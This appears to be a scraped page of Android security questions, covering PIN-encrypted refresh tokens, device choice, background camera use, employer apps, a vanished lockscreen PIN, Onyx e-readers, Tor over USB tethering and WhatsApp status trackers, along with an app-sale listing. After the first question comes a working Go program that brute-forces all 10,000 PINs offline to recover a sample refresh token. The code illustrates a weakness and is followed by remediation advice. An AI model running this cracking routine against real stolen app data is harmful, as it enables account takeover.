Android: How safe is PBKDF2 with a 4 digit pin?

Our Product Manager wants a 4-digit PIN for login in our app, obviously for UX reasons, so users don't have to remember their password each time they log in.

A refresh token can be retrieved from the backend to obtain a session token, which has access to the API. In our app, we encrypt the refresh token with AES and PBKDF2. A random salt and IV are generated, plus the 4-digit PIN is used as the password for PBKDF2.

After the encryption, I store the salt, IV and the ciphertext base64-encoded in a private shared preference.

The encryption code looks like this:

import android.security.keystore.KeyProperties
import android.util.Base64
import java.security.Key
import java.security.SecureRandom
import javax.crypto.Cipher
import javax.crypto.SecretKeyFactory
import javax.crypto.spec.IvParameterSpec
import javax.crypto.spec.PBEKeySpec
import javax.crypto.spec.SecretKeySpec

const val CPR_TRANSFORMATION = "AES/CBC/PKCS7Padding"
const val ALGORITHM_TYPE = "PBKDF2WithHmacSHA1"
const val ITERATION_AMOUNT = 12000
const val KEY_SIZE = 256

// Salt, IV and ciphertext, each base64-encoded, as stored in shared preferences.
data class Encrypted(val salt: String, val iv: String, val cipherText: String)

// Helper not shown in the question; assumed to be android.util.Base64 without line wrapping.
private fun ByteArray.encodeBase64(): String = Base64.encodeToString(this, Base64.NO_WRAP)

private fun encrypt(passCode: String, data: ByteArray): Encrypted { // e.g. passCode = "0000"
    // Fresh random salt for PBKDF2 and a fresh random IV for CBC on every call.
    val salt = ByteArray(256)
    SecureRandom().nextBytes(salt)

    val iv = ByteArray(16)
    SecureRandom().nextBytes(iv)

    val cipher = Cipher.getInstance(CPR_TRANSFORMATION)
    cipher.init(Cipher.ENCRYPT_MODE, getSecretKey(passCode, salt), IvParameterSpec(iv))
    val raw = cipher.doFinal(data)
    return Encrypted(salt.encodeBase64(), iv.encodeBase64(), raw.encodeBase64())
}

// Derives the AES key from the 4-digit PIN and the salt with PBKDF2-HMAC-SHA1.
private fun getSecretKey(passCode: String, salt: ByteArray): Key {
    val pbKeySpec = PBEKeySpec(passCode.toCharArray(), salt, ITERATION_AMOUNT, KEY_SIZE)
    val keyBytes = SecretKeyFactory.getInstance(ALGORITHM_TYPE).generateSecret(pbKeySpec).encoded
    return SecretKeySpec(keyBytes, KeyProperties.KEY_ALGORITHM_AES)
}

Now my question is: How secure is this implementation?

  • How could an attacker retrieve the refresh token from shared preferences and decrypt it?
  • Is the symmetric key inside a secure element?
  • How safe is this implementation against malware or root?
  • How easily can the key be brute-forced? (other than the user manually trying 10k PINs)
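As an added example (not code from the question and not the app's own code), the Go program below reimplements the scheme in the question with its constants (PBKDF2-HMAC-SHA1, 12000 iterations, AES-256-CBC with PKCS7 padding, 256-byte salt, 16-byte IV) and then runs the attack the last bullet asks about: once the salt, IV and ciphertext have been copied out of the private shared preferences (root, a backup, or any process that can read that file), nothing rate-limits guessing, so all 10,000 PINs are simply tried offline. The PBKDF2 routine is a plain RFC 2898 implementation written for this example, and the sample refresh token and the PIN "4271" are constructed values.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha1"
	"fmt"
	"time"
)

// Parameters from the question: PBKDF2-HMAC-SHA1, 12000 iterations, AES-256-CBC/PKCS7.
const iterationAmount, keySizeBytes, saltSize, ivSize = 12000, 32, 256, 16

type Encrypted struct{ Salt, IV, Ciphertext []byte } // what the app keeps in shared preferences, before base64

// pbkdf2SHA1 is RFC 2898 PBKDF2 with HMAC-SHA1, matching Java's "PBKDF2WithHmacSHA1" for an ASCII PIN.
func pbkdf2SHA1(password, salt []byte, iter, keyLen int) []byte {
	prf := hmac.New(sha1.New, password)
	var out []byte
	for block := uint32(1); len(out) < keyLen; block++ {
		prf.Reset()
		prf.Write(salt)
		prf.Write([]byte{byte(block >> 24), byte(block >> 16), byte(block >> 8), byte(block)}) // INT(block)
		u := prf.Sum(nil)
		t := append([]byte(nil), u...)
		for i := 1; i < iter; i++ { // U_2 .. U_c, XORed into T
			prf.Reset()
			prf.Write(u)
			u = prf.Sum(nil)
			for j := range t {
				t[j] ^= u[j]
			}
		}
		out = append(out, t...)
	}
	return out[:keyLen]
}

// EncryptWithPIN reproduces the app's encrypt(): fresh random salt and IV, AES key derived from the PIN.
func EncryptWithPIN(pin string, plaintext []byte, iter int) (Encrypted, error) {
	buf := make([]byte, saltSize+ivSize)
	if _, err := rand.Read(buf); err != nil {
		return Encrypted{}, err
	}
	salt, iv := buf[:saltSize], buf[saltSize:]
	block, err := aes.NewCipher(pbkdf2SHA1([]byte(pin), salt, iter, keySizeBytes))
	if err != nil {
		return Encrypted{}, err
	}
	pad := aes.BlockSize - len(plaintext)%aes.BlockSize
	padded := append(append([]byte(nil), plaintext...), bytes.Repeat([]byte{byte(pad)}, pad)...)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	return Encrypted{Salt: salt, IV: iv, Ciphertext: ct}, nil
}

// decryptWithPIN returns false on malformed PKCS7 padding, which is what a wrong key usually yields.
func decryptWithPIN(pin string, enc Encrypted, iter int) ([]byte, bool) {
	block, err := aes.NewCipher(pbkdf2SHA1([]byte(pin), enc.Salt, iter, keySizeBytes))
	if err != nil || len(enc.IV) != aes.BlockSize || len(enc.Ciphertext) == 0 || len(enc.Ciphertext)%aes.BlockSize != 0 {
		return nil, false
	}
	pt := make([]byte, len(enc.Ciphertext))
	cipher.NewCBCDecrypter(block, enc.IV).CryptBlocks(pt, enc.Ciphertext)
	n := int(pt[len(pt)-1])
	if n == 0 || n > aes.BlockSize || !bytes.Equal(pt[len(pt)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, false
	}
	return pt[:len(pt)-n], true
}

// looksLikeToken weeds out the roughly 1-in-256 wrong keys whose garbage still unpads cleanly:
// a refresh token is printable ASCII, random AES output almost never is.
func looksLikeToken(b []byte) bool {
	return len(b) > 0 && bytes.IndexFunc(b, func(r rune) bool { return r < 0x20 || r > 0x7e }) < 0
}

// BruteForcePIN is the offline attack: with salt, IV and ciphertext copied out of
// shared preferences there is no lockout, so every one of the 10,000 PINs is tried.
func BruteForcePIN(enc Encrypted, iter int) (pin string, plaintext []byte, found bool) {
	for i := 0; i < 10000; i++ {
		pin = fmt.Sprintf("%04d", i)
		if pt, ok := decryptWithPIN(pin, enc, iter); ok && looksLikeToken(pt) {
			return pin, pt, true
		}
	}
	return "", nil, false
}

func main() {
	token := []byte("constructed-sample-refresh-token-8f3a2c9d1e4b7a6c5d0f") // constructed, not a real token
	enc, _ := EncryptWithPIN("4271", token, iterationAmount)
	start := time.Now()
	pin, pt, ok := BruteForcePIN(enc, iterationAmount)
	fmt.Printf("found=%v pin=%s token=%q in %v\n", ok, pin, pt, time.Since(start))
}
```

Running it shows the scale of the problem: one PBKDF2 derivation at 12000 iterations costs a few milliseconds on a laptop core, so the whole PIN space falls in well under a minute, and raising the iteration count or key size only scales that constant, never the 10^4 search space. The 10k "manual" attempts in the question are irrelevant because the attacker never touches the app's UI. What changes the picture is keeping the key somewhere the attacker cannot copy, for example an Android Keystore key that requires user authentication, or having the server enforce the PIN with a lockout instead of the client.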

Which smartphone is more secure, iPhone or Android?

I need to decide whether or not I will push all of my employees to Apple or Android. Right now we're about an even split and I'd really like to have them all on one side. It really comes down to which phone is more secure, the new iPhones or the new Androids? These phones are only used for email connectivity.

  • What features make one more safe than the other?
  • What vulnerabilities have been seen between these two phones?
  • Which is more security oriented?

How to check if Android app is taking pictures in the background? [migrated]

I have an Android app that I found to be loading the camera in the background. It's one of the most widely used internet browsers.

I've been trying to debug what is actually happening with LogCat in the Android Device Monitor. A couple of lines that catch my eye:

I/CameraManagerGlobal(24529): getCameraService: Reconnecting to camera service
I/CameraService(331): getCameraCharacteristics: Switching to HAL1 shim implementation...
I/NuPlayer(331): setDataSourceAsync(URL suppressed)
I/CameraClient(331): Opening camera 1
E/QCamera2HWI(331): [KPI Perf] int qcamera::QCamera2HardwareInterface::openCamera(hw_device_t**): E PROFILE_OPEN_CAMERA camera id 1
I/QCameraHalWatchdog(331): Starting Watchdog Thread...
E/mm-camera-intf(331): mm_camera_open: dev name = /dev/video2, cam_idx = 2
D/QCameraParameters(331): int32_t qcamera::QCameraParameters::initDefaultParameters(): supported pic sizes: 1280x960,1280x720,640x480,352x288
D/QCameraParameters(331): int32_t qcamera::QCameraParameters::setNumOfSnapshot(): nBurstNum = 1, nExpnum = 1
I/QCameraHalWatchdog(331): Stopped Watchdog Thread...
I/CameraClient(331): Destroying camera 1
E/QCameraPostProc(331): int32_t qcamera::QCameraPostProcessor::deinit(): Jpeg closed, rc = 0, mJpegClientHandle = 7900

How would I know if a picture is actually taken?

Is this possibly normal behavior to check camera availability?

3rd party (employer’s) app on android phone – what is the risk for an employee?

An employer (someone's employer) issued an Android app and requests that all of the employees install it. During installation the app requests access to all of the phone's resources, and it won't work if the access is declined.

The official purpose of the app is sending some internal requests concerning work-related stuff. But, who knows, maybe an employer has some additional goals.

What is the risk for employees when installing such an app on a personal phone? What might an employer see on an employee's phone? Could it see the employee's location? What files or personal data can it get access to?

What can an employee do to restrict the employer’s access?

The question is not about using a separate phone. A separate phone for each app is not what the question is about. It is about a 3rd party app on a personal phone.

Android phone’s lockscreen PIN disappeared?

I own a ZTE Axon 7 (model 2017G) that I purchased secondhand from a reputable vendor in Germany ca. 3 years ago. The phone has been working well, and I updated the OS to Android 8.0 manually earlier this year using an official image from ZTE.

A severe case of butterfingers affected me yesterday (and I guess today), and I dropped the phone a couple of times (the phone has never been in use without this very good TPU case from this company called Spigen). The last of these drops (today) broke the display. No physical damage, but half the screen is "gone"; it looks like the display pictured in this iFixit thread but with multicolored dots instead of lines.

I wasn’t too worried about this (hopefully it’s just a loose cable), but then I noticed I was only swiping up to get past the lockscreen. Now here’s the thing: I’ve always used this phone with a 4-digit lockscreen PIN. I can confirm–that as recently as yesterday–my partner and I mentioned the PIN because my phone had died (battery ran too low), and they had to enter the PIN after restarting it; so this isn’t my imagination going wild.

As far as I can tell, nothing else has been affected. All the data still seems to be there, and nothing seems to have been "hacked" (I even briefly texted my partner with the broken screen to let them know that the screen is broken).

I went and checked in the settings, and the lockscreen PIN isn’t active there either as far as I can tell (so it doesn’t seem to be some kind of a glitch). I restarted the phone, and it asked for the PIN as it does normally to authorize the SIM. So it appears the lockscreen PIN has been disabled entirely, but it wasn’t me who disabled it.

How is this even possible? Can the phone being dropped at a weird angle disable the lockscreen PIN? (It sounds ridiculous just even typing that.) How can I check for signs of intrusion on the device (with the broken screen)?

Some "events"/facts that may be of relevance(?):

  • The one other question I have on this SE is about legitimate Google 2FA codes arriving from random numbers. This hadn’t happened in a while, but it happened again on 29.06.2020 (this Monday).
  • I always put my phone next to the bed during the night, and I did so last night. The phone was in another room this morning, however. Neither my partner nor I remember moving it. It is plausible that I moved the phone (I have a mild tendency to sleep walk), but I doubt I would have been able to disable the PIN in my sleep.
  • The phone’s storage is not encrypted.

Can one trust OS and apps from Onyx: app store, modified Android, Onyx Cloud

Onyx Boox is a brand of e-book reader produced by Onyx International Inc, based in China. Their e-book readers are based on the Android OS. They have features that can violate user privacy or the security of other accounts:

  1. App store with apps from other app stores optimized for e-book readers: Kindle, Office, Evernote, etc.
  2. Account manager: Dropbox, Evernote, etc.
  3. Option to enable Google Play and other Google services (like Calendar)
  4. Onyx Cloud (sync of personal notes, etc.)

So the question is: are there any signs of backdoors or vulnerabilities known about their modified apps, the OS itself or other components that can lead to user data leaks (privacy leaks or leaks of sensitive information such as passwords or other data)?

[Android APP] Gym Buddy – Find a Gym Partner (3200 Active Accounts)

Selling Android APP
https://play.google.com/store/apps/details?id=com.backbencherslab.gymbuddy

What is included in the sale?

  1. Domain: Gymbuddy.org
  2. Full Source Code as received from Developer for the Android APP
  3. Full Server Side Code

What is required to keep the app operational?

  1. All you need is to pay the yearly domain and hosting costs, which are up to you.

Why are you selling the app?

  1. I don't…

How can I stay safe when I’m visiting potentially harmful websites on Android 9.0+ or similar MIUI?

I mean harmful in the sense that they might have ads, popups or other ways in which they might transfer malware to my phone or exploit vulnerabilities. And by visiting I mean interacting: clicking on items found on them, playing videos on them, adult sites being one example of such websites.

Is there a sandbox or a VM on such Android phone that might help? Or am I secured if I have a basic antivirus, NoScript and an adblocker? Is there any you would recommend?

What threats does Android pose to anonymity when the internet is accessed from a laptop through USB tethering but over Tor?

I use USB tethering on an Android 10 mobile to access the internet on my laptop. I use Tor Browser (TB) on the laptop and keep my OS (a Linux distro) on the laptop patched for security vulnerabilities. At times I need to consume certain content from websites which I don't want any intermediary to know about.

Can my mobile device see what data I am requesting and receiving other than that I am connected to a Tor entry node and passing data to it back and forth?

Here’s what I have in mind:

  1. I enter security.stackexchange.com in TB’s URL bar in laptop
  2. TB establishes a secure connection and sends my request to Tor network.
  3. My telecom provider, the first potentially hostile intermediary I usually think of, can see only that I am connected to the Tor network. For scope reduction of this question, let us become ignorant and assume that my ISP or any intermediary further down does not have the capability to either see my original request or link it back to me.

So far, reasonably good. But, the first intermediary seems to be the Android 10 device itself. How can I be sure that my Android 10 device cannot know what data I am requesting and receiving other than that I am connected to Tor?

I am concerned because my mobile device is potentially hostile in my eyes. I do not know the capabilities of the baseband OS (which some state-sponsored entities may exploit), and I don't know the vulnerabilities of my Android 10 device, which has vanilla Android fused with proprietary code. My mobile device is also at the mercy of its OEM, which may not provide security updates for it in the future.

How can an Android app like Whatslog detect a user's online status from WhatsApp?

Whatslog on Android allows you to check the online status of WhatsApp users. You don't need to scan a WhatsApp QR code; you just have to enter a phone number and it works pretty well.

I don’t understand how they do it.

  • I'm pretty sure they don't use web.whatsapp.com, because they don't ask for any QR code. Furthermore, I have reverse-engineered the APK to Java with jadx and I don't see any trace of them using any "hidden" WhatsApp API or anything like that.

  • I don't see any communication between Whatslog and WhatsApp through Android Intents or the like.

There is this question which discusses the same thing, but the answers talk about web.whatsapp.com, and I'm pretty sure that's not what they use: How can application like Whatsdog detect user online status from Whatsapp?